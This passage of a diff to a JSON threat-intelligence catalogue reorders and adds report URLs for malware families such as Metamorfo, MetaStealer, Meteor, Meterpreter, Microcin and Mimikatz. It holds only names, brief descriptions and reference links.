"https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf", - "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md", "https://blog.ensilo.com/metamorfo-avast-abuser", - "https://cofense.com/blog/autohotkey-banking-trojan/", - "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", - "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam", + "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf", "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", - "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html" + "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", + "https://twitter.com/MsftSecIntel/status/1418706916922986504", + "https://cofense.com/blog/autohotkey-banking-trojan/", + "https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerou", + "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md", + "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors" ], "synonyms": [ "Casbaneiro" @@ -33401,16 +34982,16 @@ "value": "Metamorfo" }, { - "description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META – a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.", + "description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META \u2013 a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer", - "https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/", + "https://medium.com/walmartglobaltech/metastealer-string-decryption-and-dga-overview-5f38f76830cd", + "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", "https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web", "https://ke-la.com/information-stealers-a-new-landscape/", - "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", "https://research.nccgroup.com/2022/05/20/metastealer-filling-the-racoon-void/", - "https://medium.com/walmartglobaltech/metastealer-string-decryption-and-dga-overview-5f38f76830cd" + "https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/" ], "synonyms": [], "type": [] @@ -33423,12 +35004,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.meteor", - "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/", - "https://twitter.com/_cpresearch_/status/1541753913732366338", + "https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/", "https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://twitter.com/_cpresearch_/status/1541753913732366338", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/" + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/" ], "synonyms": [], "type": [] @@ -33441,43 +35022,46 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter", - "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", - "https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea", - "http://schierlm.users.sourceforge.net/avevasion.html", "https://unit42.paloaltonetworks.com/atoms/obscureserpens/", - "https://asec.ahnlab.com/ko/26705/", - "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", - "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", - "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", - "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", - "http://www.secureworks.com/research/threat-profiles/gold-franklin", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/", - "https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence", - "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", - "https://blog.morphisec.com/fin7-attacks-restaurant-industry", - "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", - "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "http://www.secureworks.com/research/threat-profiles/gold-winter", - "https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/", - "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", - "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", - "https://redcanary.com/blog/getsystem-offsec/", - "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/", - "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", - "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", - "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", - "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux", + "https://asec.ahnlab.com/en/53046/", "https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/", + "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", + "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/", + "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", + "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", + "https://asec.ahnlab.com/ko/26705/", + "https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", "https://explore.group-ib.com/htct/hi-tech_crime_2018", + "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", + "https://blog.morphisec.com/fin7-attacks-restaurant-industry", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "http://www.secureworks.com/research/threat-profiles/gold-winter", + "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/", - "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/" + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", + "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/", + "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", + "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", + "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/", + "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", + "http://schierlm.users.sourceforge.net/avevasion.html", + "https://redcanary.com/blog/getsystem-offsec/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", + "https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence", + "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx", + "https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea", + "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", + "http://www.secureworks.com/research/threat-profiles/gold-franklin" ], "synonyms": [], "type": [] @@ -33490,10 +35074,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mevade", - "https://www.youtube.com/watch?v=FttiysUZmDw", "https://blog.fox-it.com/2013/09/05/large-botnet-cause-of-recent-tor-network-overload/", - "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/", + "https://www.youtube.com/watch?v=FttiysUZmDw", + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" ], "synonyms": [ "SBC", @@ -33521,12 +35105,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot", - "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", - "https://twitter.com/GossiTheDog/status/1438500100238577670", - "https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/", - "https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf", "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware", - "https://www.youtube.com/watch?v=LeKi0KfzOow&list=PLffioUnqXWkdzWcZXH-bzPVgcs2R4r7iS&index=1&t=2154s" + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/", + "https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/", + "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt-attacks-telecoms-africa-mgbot", + "https://twitter.com/GossiTheDog/status/1438500100238577670", + "https://www.youtube.com/watch?v=LeKi0KfzOow&list=PLffioUnqXWkdzWcZXH-bzPVgcs2R4r7iS&index=1&t=2154s", + "https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf" ], "synonyms": [ "BLame", @@ -33568,13 +35154,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor", "https://www.mandiant.com/resources/spear-phish-ukrainian-entities", - "https://github.com/cr4sh/microbackdoor", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://attackiq.com/2022/04/29/attack-graph-response-to-unc1151-continued-targeting-of-ukraine/", "https://cluster25.io/2022/03/08/ghostwriter-unc1151-adopts-microbackdoor-variants-in-cyber-operations-against-targets-in-ukraine/", - "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/", + "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", "https://cert.gov.ua/article/37626", + "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/", + "https://github.com/cr4sh/microbackdoor", + "https://attackiq.com/2022/04/29/attack-graph-response-to-unc1151-continued-targeting-of-ukraine/", + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", "https://ti.qianxin.com/blog/articles/Analysis-of-attack-activities-of-suspected-aptorganization-unc1151-against-ukraine-and-other-countries/" ], "synonyms": [], @@ -33588,20 +35174,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", - "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", - "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636", - "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia", - "https://securelist.com/microcin-is-here/97353/", - "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/", - "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia", - "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", "https://securelist.com/microcin-is-here/97353", + "https://github.com/dlegezo/common", + "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/", + "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia", + "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia", + "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf", + "https://securelist.com/microcin-is-here/97353/", "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", - "https://github.com/dlegezo/common" + "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf" ], "synonyms": [], "type": [] @@ -33614,13 +35200,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", + "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", - "https://blog.talosintelligence.com/2022/02/arid-viper-targets-palestine.html", "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/micropsia_apt_c_23.md", - "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", "https://research.checkpoint.com/apt-attack-middle-east-big-bang/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks", - "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf" + "https://blog.talosintelligence.com/2022/02/arid-viper-targets-palestine.html", + "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks" ], "synonyms": [], "type": [] @@ -33633,8 +35219,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.midas", - "https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants", "https://news.sophos.com/en-us/2022/01/25/windows-services-lay-the-groundwork-for-a-midas-ransomware-attack/", + "https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants", "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/" ], "synonyms": [], @@ -33661,8 +35247,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.milan", - "https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/", - "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf" + "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf", + "https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/" ], "synonyms": [], "type": [] @@ -33688,9 +35274,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", "https://securelist.com/wildpressure-targets-macos/103072/", - "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf" + "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/" ], "synonyms": [], "type": [] @@ -33729,138 +35315,141 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", - "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", - "https://www.crowdstrike.com/blog/overwatch-elite-call-escalation-vital-to-containing-attack/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks", - "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations", - "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/", - "http://www.secureworks.com/research/threat-profiles/gold-kingswood", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/", - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", - "https://www.mandiant.com/resources/blog/alphv-ransomware-backup", - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", - "https://blog.xpnsec.com/exploring-mimikatz-part-1/", - "https://www.secureworks.com/research/threat-profiles/cobalt-hickman", - "https://www.infinitumit.com.tr/apt-35/", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", - "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", - "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/", - "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", - "https://www.ic3.gov/Media/News/2021/210823.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-drake", - "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", - "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-152a", - "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", - "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", - "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html", - "https://www.ic3.gov/media/news/2020/200917-1.pdf", - "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://twitter.com/inversecos/status/1456486725664993287", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021", - "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_Intel_WP_InitAccess-IndEnvirons-Final.pdf", - "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", - "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", - "https://www.ic3.gov/Media/News/2021/210527.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.theta.co.nz/news-blogs/cyber-security-blog/snakes-ladders-the-offensive-use-of-python-on-windows/", - "https://attack.mitre.org/groups/G0011", - "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/", - "https://asec.ahnlab.com/ko/39682/", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf", - "https://attack.mitre.org/groups/G0034", - "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf", - "https://www.intrinsec.com/apt27-analysis/", - "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf", - "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://noticeofpleadings.com/nickel/#", - "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", - "https://www.varonis.com/blog/hive-ransomware-analysis", - "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/", - "https://github.com/gentilkiwi/mimikatz", - "https://securelist.com/the-sessionmanager-iis-backdoor/106868/", - "https://volatility-labs.blogspot.com/2021/10/memory-forensics-r-illustrated.html", - "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", - "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/", - "https://attack.mitre.org/groups/G0096", - "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", - "http://www.secureworks.com/research/threat-profiles/gold-burlap", "https://unit42.paloaltonetworks.com/atoms/obscureserpens/", - "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", + "https://assets.virustotal.com/reports/2021trends.pdf", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/", "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/", - "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", + "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics", + "https://twitter.com/inversecos/status/1456486725664993287", + "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_Intel_WP_InitAccess-IndEnvirons-Final.pdf", "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", "https://www.secureworks.com/research/threat-profiles/gold-kingswood", - "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", - "https://www.hvs-consulting.de/lazarus-report/", - "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", - "http://www.secureworks.com/research/threat-profiles/gold-franklin", - "https://www.secureworks.com/research/threat-profiles/gold-drake", - "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks", - "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks", + "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", + "https://www.theta.co.nz/news-blogs/cyber-security-blog/snakes-ladders-the-offensive-use-of-python-on-windows/", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://www.secureworks.com/research/threat-profiles/bronze-atlas", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", - "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", - "https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east", - "https://www.secureworks.com/blog/ransomware-deployed-by-adversary", - "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran", - "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", - "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", - "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf", - "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html", - "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", - "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel", - "https://www.secureworks.com/research/samsam-ransomware-campaigns", - "https://assets.virustotal.com/reports/2021trends.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", - "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", - "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", - "https://www.slideshare.net/yurikamuraki5/active-directory-240348605", - "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection", - "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf", - "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf", - "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf", - "https://paraflare.com/attack-lifecycle-detection-of-an-operational-technology-breach/", - "https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/", - "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html", - "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/", - "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf", - "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics", - "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two", - "https://www.secureworks.com/research/threat-profiles/bronze-vinewood", - "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns", - "https://twitter.com/swisscom_csirt/status/1354052879158571008", - "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", - "https://unit42.paloaltonetworks.com/trigona-ransomware-update/", - 